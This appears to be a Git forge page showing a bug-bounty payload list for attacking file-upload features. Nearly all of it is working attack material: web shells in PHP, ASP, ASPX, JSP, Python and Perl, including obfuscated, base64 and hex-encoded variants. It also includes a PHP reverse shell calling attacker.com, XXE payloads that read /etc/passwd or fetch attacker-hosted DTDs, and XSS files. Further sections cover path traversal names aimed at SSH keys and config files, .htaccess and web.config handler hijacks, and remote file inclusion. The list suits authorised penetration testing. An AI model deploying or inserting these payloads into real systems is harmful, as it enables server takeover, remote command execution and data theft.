0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 19:36:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
5c4486169d46de65159bbc18881a92bb758f79b0
hunting/File-Upload/file-upload-payloads.txt
T
copilot-swe-agent[bot] c7627288f3 Minor improvements to payload documentation and clarity 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
2026-01-04 19:48:54 +00:00

653 lines
14 KiB
Plaintext
Raw Blame History

This file contains invisible Unicode characters
This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# File Upload Vulnerability Payloads (2020-2025 Bug Bounty Tested)
# ============================
# FILE EXTENSION BYPASSES
# ============================
# Double Extensions
shell.php.jpg
shell.php.png
shell.php.gif
shell.php.pdf
shell.php.txt
shell.jpg.php
shell.png.php
exploit.asp.jpg
exploit.aspx.png
backdoor.jsp.gif
# Case Variations
shell.PHP
shell.PhP
shell.pHp
shell.Php
shell.PHp
shell.ASP
shell.ASPX
shell.AsP
shell.JSP
# Null Byte Injection (older systems)
shell.php%00.jpg
shell.php%00.png
shell.php\x00.jpg
shell.asp%00.gif
exploit.jsp%00.pdf
# Special Characters
shell.php.....
shell.php%20
shell.php%0a
shell.php%00
shell.php%0d%0a
shell.php::$DATA
shell.php::$INDEX_ALLOCATION
# Alternate Extensions (PHP)
shell.php3
shell.php4
shell.php5
shell.php7
shell.phtml
shell.phar
shell.phpt
shell.pgif
shell.pht
shell.inc
shell.hphp
shell.ctp
# Alternate Extensions (ASP/ASPX)
shell.asp
shell.aspx
shell.asa
shell.asax
shell.ascx
shell.ashx
shell.asmx
shell.cer
shell.config
shell.soap
shell.rem
# Alternate Extensions (JSP)
shell.jsp
shell.jspx
shell.jsw
shell.jsv
shell.jspf
# Other Language Extensions
shell.pl
shell.pm
shell.cgi
shell.py
shell.pyc
shell.rb
shell.rbw
shell.sh
shell.bash
# Executable Extensions
malware.exe
backdoor.bat
script.cmd
payload.ps1
reverse.sh
# Server Config Files
.htaccess
.htpasswd
web.config
httpd.conf
.user.ini
php.ini
# ============================
# CONTENT-TYPE BYPASSES
# ============================
# Common Content-Type Headers to Test:
# Legitimate looking but with malicious content
Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
Content-Type: image/bmp
Content-Type: image/svg+xml
Content-Type: application/pdf
Content-Type: application/zip
Content-Type: text/plain
Content-Type: text/csv
Content-Type: application/octet-stream
Content-Type: video/mp4
Content-Type: audio/mpeg
# Empty or null
Content-Type:
Content-Type: null
Content-Type: undefined
# Malformed
Content-Type: image/jpeg; charset=binary
Content-Type: multipart/form-data; boundary=something
# ============================
# MAGIC BYTES (File Signatures)
# ============================
# PHP Web Shell with JPEG Header
FF D8 FF E0 (JPEG magic bytes)
<?php system($_GET['cmd']); ?>
# PHP Web Shell with PNG Header
89 50 4E 47 0D 0A 1A 0A (PNG magic bytes)
<?php system($_GET['cmd']); ?>
# PHP Web Shell with GIF Header
GIF89a
<?php system($_GET['cmd']); ?>
# PHP Web Shell with PDF Header
%PDF-1.4
<?php system($_GET['cmd']); ?>
# PHP Web Shell with ZIP Header
PK (ZIP magic bytes)
<?php system($_GET['cmd']); ?>
# ============================
# POLYGLOT FILES (Valid Image + Valid Code)
# ============================
# GIF + PHP Polyglot
GIF89a<?php system($_GET['cmd']); ?>
# JPEG + PHP Polyglot (with comment)
# Add PHP code in JPEG comment section
# Use exiftool: exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# PNG + PHP Polyglot
# Use PNG ancillary chunks to hide PHP code
# BMP + PHP Polyglot
# BMP header followed by PHP code in pixel data
# ============================
# WEB SHELL PAYLOADS
# ============================
# === PHP Web Shells ===
# Simple PHP Shell
<?php system($_GET['cmd']); ?>
# PHP Shell with POST
<?php system($_POST['cmd']); ?>
# PHP Eval Shell
<?php eval($_REQUEST['cmd']); ?>
# PHP Passthru Shell
<?php passthru($_GET['cmd']); ?>
# PHP Exec Shell
<?php echo exec($_GET['cmd']); ?>
# PHP Shell_exec
<?php echo shell_exec($_GET['cmd']); ?>
# PHP Backdoor
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
# PHP File Manager Shell
<?php
if(isset($_GET['file'])){
echo file_get_contents($_GET['file']);
}
if(isset($_FILES['upload'])){
move_uploaded_file($_FILES['upload']['tmp_name'], $_FILES['upload']['name']);
}
?>
# PHP One-liner Shells
<?=`$_GET[x]`?>
<?=system($_GET[x]);?>
<?=shell_exec($_GET[x]);?>
<?=passthru($_GET[x]);?>
<?=exec($_GET[x]);?>
# Obfuscated PHP Shell
<?php $a=$_GET['a'];$b=$_GET['b'];$a($b);?>
<?php @eval($_POST['x']);?>
<?php @assert($_POST['x']);?>
<?php $f='sys'.'tem';$f($_GET['x']);?>
# PHP Reverse Shell
<?php
$sock=fsockopen("attacker.com",4444);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
# === ASP/ASPX Web Shells ===
# ASP Shell
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Response.Write(oScript.Exec("cmd /c " & Request.QueryString("cmd")).StdOut.ReadAll())
%>
# ASPX Shell
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object sender, EventArgs e){
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c " + Request.QueryString["cmd"];
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.UseShellExecute = false;
p.Start();
Response.Write(p.StandardOutput.ReadToEnd());
}
</script>
# ASPX One-liner
<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
# === JSP Web Shells ===
# JSP Shell
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
InputStream in = p.getInputStream();
int i;
while((i = in.read()) != -1) {
out.print((char)i);
}
%>
# JSP One-liner
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
# === Python Web Shell ===
#!/usr/bin/env python
import os
import cgi
form = cgi.FieldStorage()
cmd = form.getvalue('cmd')
os.system(cmd)
# === Perl Web Shell ===
#!/usr/bin/perl
use CGI;
$q = CGI->new;
print $q->header;
print `$q->param('cmd')`;
# ============================
# XSS VIA FILE UPLOAD
# ============================
# HTML File Upload
<html>
<body>
<script>alert(document.cookie)</script>
</body>
</html>
# SVG File Upload with XSS
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
# SVG with XSS (onload)
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
# PDF with XSS (if rendered in browser)
%PDF-1.4
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction << /S /JavaScript /JS (app.alert('XSS');) >>
>>
endobj
# XML with XSS
<?xml version="1.0"?>
<!DOCTYPE html [
<!ENTITY js "alert(document.domain)">
]>
<html>
<body>
<script>&js;</script>
</body>
</html>
# ============================
# XXE VIA FILE UPLOAD
# ============================
# SVG with XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
# XML with XXE
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
# XXE - Parameter Entity
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<foo>&exfil;</foo>
# XXE - Blind OOB
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker.com/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
# ============================
# PATH TRAVERSAL IN FILENAME
# ============================
# Directory Traversal
../../../etc/passwd
..\..\..\..\windows\system32\config\sam
....//....//....//etc/passwd
# Overwrite Important Files
../../../var/www/html/index.php
../../../.ssh/authorized_keys
../../config.php
../../../.htaccess
../../wp-config.php
# Filename with Path Traversal
../../../../tmp/shell.php
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
# ============================
# HTACCESS FILE UPLOAD
# ============================
# .htaccess to Execute PHP
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .png
AddType application/x-httpd-php .gif
# .htaccess to Execute All Files as PHP
AddType application/x-httpd-php .
SetHandler application/x-httpd-php
# .htaccess to Bypass Upload Restrictions
<FilesMatch "\.ph(p|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
# ============================
# WEB.CONFIG FILE UPLOAD (IIS)
# ============================
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers>
<add name="PHP_via_FastCGI"
path="*.jpg"
verb="*"
modules="FastCgiModule"
scriptProcessor="C:\PHP\php-cgi.exe"
resourceType="Unspecified" />
</handlers>
</system.webServer>
</configuration>
# ============================
# ARCHIVE-BASED ATTACKS
# ============================
# ZIP Slip - Malicious Archive
# Create zip file with: ../../../../var/www/html/shell.php
# ZIP with Symlink
# ln -s /etc/passwd passwd.txt
# zip --symlinks payload.zip passwd.txt
# TAR with Path Traversal
# tar -cf payload.tar ../../../../var/www/html/shell.php
# Zip Bomb (DoS)
# Create highly compressed file that expands to huge size
# ============================
# IMAGE METADATA INJECTION
# ============================
# EXIF Data with XSS (if displayed)
exiftool -Comment='<script>alert(1)</script>' image.jpg
# EXIF Data with PHP Code
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# IPTC Data Injection
exiftool -IPTC:Caption-Abstract='<?php eval($_POST["x"]); ?>' image.jpg
# ============================
# SERVER-SPECIFIC BYPASSES
# ============================
# Apache
shell.php.jpg (with .htaccess: AddType application/x-httpd-php .jpg)
.htaccess file to execute images as PHP
# IIS
shell.asp;.jpg
shell.asp:.jpg
web.config to execute images as ASP
# Nginx
shell.php%00.jpg (older versions)
Upload to misconfigured alias/location
# Tomcat
shell.jsp%00.jpg
shell.jspx
# ============================
# RACE CONDITION FILE UPLOAD
# ============================
# RACE CONDITION FILE UPLOAD
# ============================
# Upload file quickly and access before validation/deletion
# Technique: Concurrent upload and access requests
# Example: Upload shell.php and immediately request http://target.com/uploads/shell.php
# Use tools like Burp Suite Turbo Intruder or custom scripts to send simultaneous requests
# ============================
# FILE UPLOAD WITH SIZE BYPASS
# ============================
# Small malicious file
<?=`$_GET[0]`?>
# Compressed PHP shell
<?=`{$_GET[0]}`;
# ============================
# MIME TYPE CONFUSION
# ============================
# Upload with different MIME types
Content-Type: application/x-php
Content-Type: application/x-httpd-php
Content-Type: application/php
Content-Type: text/php
Content-Type: text/x-php
# ============================
# POLYGLOT FILES FOR MULTIPLE FORMATS
# ============================
# JPEG + JAR Polyglot (for Java apps)
# Valid JPEG and valid JAR simultaneously
# PDF + HTML Polyglot
%PDF-1.4
<html><script>alert(1)</script></html>
# GIF + JavaScript
GIF89a/*<?php
<script>alert(1)</script>
<?php */;
# ============================
# MODERN BYPASS TECHNIQUES (2023-2025)
# ============================
# Unicode Normalization
shell.php%E2%80%AE.jpg (Right-to-Left Override)
shellgpj.php (RLO character)
# Homoglyph Attacks
shell.рhр (Cyrillic р instead of Latin p)
shell.рhр
# UTF-8 BOM
<?php system($_GET['cmd']); ?>
# Long Filename DoS
# Create extremely long filename to bypass validation
# Multiple Content-Disposition
Content-Disposition: form-data; name="file"; filename="safe.jpg"
Content-Disposition: form-data; name="file"; filename="shell.php"
# Null Session (Windows)
\\127.0.0.1\c$\inetpub\wwwroot\shell.php
# Case Sensitivity Issues
ShElL.PhP
SHELL.php
Shell.PHP
# ============================
# FRAMEWORK-SPECIFIC BYPASSES
# ============================
# WordPress
wp-content/uploads/shell.php
wp-content/themes/shell.php
wp-content/plugins/shell.php
# Drupal
sites/default/files/shell.php
# Joomla
media/shell.php
images/shell.php
# Laravel
storage/app/shell.php
public/uploads/shell.php
# Django
media/uploads/shell.py
# ============================
# REMOTE FILE INCLUSION VIA UPLOAD
# ============================
# Upload file containing:
<?php include($_GET['file']); ?>
<?php require($_GET['file']); ?>
<?php include_once($_GET['file']); ?>
# Then access with:
?file=http://attacker.com/shell.txt
?file=php://input (with POST data containing PHP code)
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
# ============================
# FILE UPLOAD WITH SSRF
# ============================
# Upload file that triggers SSRF
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="http://internal-server/admin"/>
</svg>
# ============================
# DESERIALIZATION VIA FILE UPLOAD
# ============================
# PHP Phar Deserialization
# Upload malicious .phar file
# Trigger via: file_get_contents('phar://uploads/payload.phar/test.txt')
# Java Deserialization
# Upload serialized Java object
# Trigger if application deserializes uploaded files
# ============================
# EICAR TEST FILE (AV Bypass Testing)
# ============================
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
# ============================
# BINARY PAYLOAD ENCODINGS
# ============================
# Base64 Encoded Shell
<?php eval(base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSk7")); ?>
# Hex Encoded
<?php eval(hex2bin("73797374656d28245f4745545b27636d64275d293b")); ?>
# ROT13
<?php eval(str_rot13("flfgrz($_TRG['pzq']);")); ?>
# ============================
# ALTERNATIVE DATA STREAMS (Windows/NTFS)
# ============================
shell.php::$DATA
shell.asp::$DATA
payload.txt:hidden.php
Reference in New Issue View Git Blame Copy Permalink